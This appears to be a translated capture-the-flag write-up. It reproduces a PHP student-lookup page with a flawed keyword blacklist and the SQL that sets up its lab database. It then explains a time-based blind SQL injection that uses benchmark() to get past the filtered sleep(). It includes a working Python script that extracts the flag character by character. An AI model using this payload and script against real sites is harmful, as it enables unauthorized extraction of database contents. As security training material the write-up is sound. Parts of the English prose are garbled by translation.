Exercise Record
Reproduce the code:
index.php
<?php
include 'config.php';
function stophack($string){
if(is_array($string)){
foreach($string as $key => $val) {
$string[$key] = stophack($val);
}
}
else{
$raw = $string;
$replace = array("\\","\"","'","/","*","%5C","%22","%27","%2A","~","insert","update","delete","into","load_file","outfile","sleep",);
$string = str_ireplace($replace, "HongRi", $string);
$string = strip_tags($string);
if($raw!=$string){
error_log("Hacking attempt.");
header('Location: /error/');
}
return trim($string);
}
}
$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
die("连接失败: ");
}
if(isset($_GET['id']) && $_GET['id']){
$id = stophack($_GET['id']);
$sql = "SELECT * FROM students WHERE id=$id";
$result = $conn->query($sql);
if($result->num_rows > 0){
$row = $result->fetch_assoc();
echo '<center><h1>查询结果为:</h1><pre>'.<<<EOF
+----+---------+--------------------+-------+
| id | name | email | score |
+----+---------+--------------------+-------+
| {$row['id']} | {$row['name']} | {$row['email']} | {$row['score']} |
+----+---------+--------------------+-------+</center>
EOF;
}
}
else die("你所查询的对象id值不能为空!");
?>
config.php
<?php
$servername = "localhost";
$username = "root";
$password = "root";
$dbname = "day10";
?>
CTF built environment using sql statement
create database day10;
use day10;
create table students (
id int(6) unsigned auto_increment primary key,
name varchar(20) not null,
email varchar(30) not null,
score int(8) unsigned not null );
INSERT INTO students VALUES(1,'Lucia','[email protected]',100);
INSERT INTO students VALUES(2,'Danny','[email protected]',59);
INSERT INTO students VALUES(3,'Alina','[email protected]',66);
INSERT INTO students VALUES(4,'Jameson','[email protected]',13);
INSERT INTO students VALUES(5,'Allie','[email protected]',88);
create table flag(flag varchar(30) not null);
INSERT INTO flag VALUES('HRCTF{tim3_blind_Sql}');
Vulnerability Analysis:
Enter the site:
http://10.211.55.2:100/day10/?id=1
Found page properly, you can operate the.
The title stems from a CMS 0day
flaw adaptation. Obviously you can see index.php
were spliced SQL statements of code at line 27, and then directly into the database query. The front line, in fact, there is a way to GET parameter id coming filtering, take a closer look at the filter function stophack
.
We can clearly see that there is stophack strict filtering function and to detect illegal characters not quit two questions directly.
If the program detects illegal characters or words will be replaced with a string HongRi, however, did not quit immediately, so that the attacker entered the attack statements will continue to be brought into database queries. Key words here are just replaced with a string HongRi, 所以我们需要绕过这里的黑名单
.
Throughout the program, when the SQL statement execution error is not an error message will be displayed, it should be here 盲注
. Developers estimate also take this into consideration, it puts a keyword sleep
to filter, however this does not affect the continued use of blinds attacker to obtain the data. About the 禁用了 sleep
function of the blinds, you can refer directly to the article: MySQL delay inject new ideas . Here I use the direct benchmark
function to get the flag.
sql blind time two other ways (benchmark, heavy query)
python procedures are as follows:
import sys, string, requests
version_chars = ".-{}_" + string.ascii_letters + string.digits + '#'
flag = ""
for i in range(1,40):
for char in version_chars:
payload = "-1 or if(ascii(mid((select flag from flag),%s,1))=%s,benchmark(200000000,7^3^8),0)" % (i,ord(char))
url = "http://10.211.55.2:100/day10/?id=%s" % payload
if char == '#':
if(flag):
sys.stdout.write("\n[+] The flag is: %s" % flag)
sys.stdout.flush()
else:
print("[-] Something run error!")
exit()
try:
r = requests.post(url=url, timeout=2.0)
except Exception as e:
flag += char
sys.stdout.write("\r[-] Try to get flag: %s" % flag)
sys.stdout.flush()
break
print("[-] Something run error!")
result: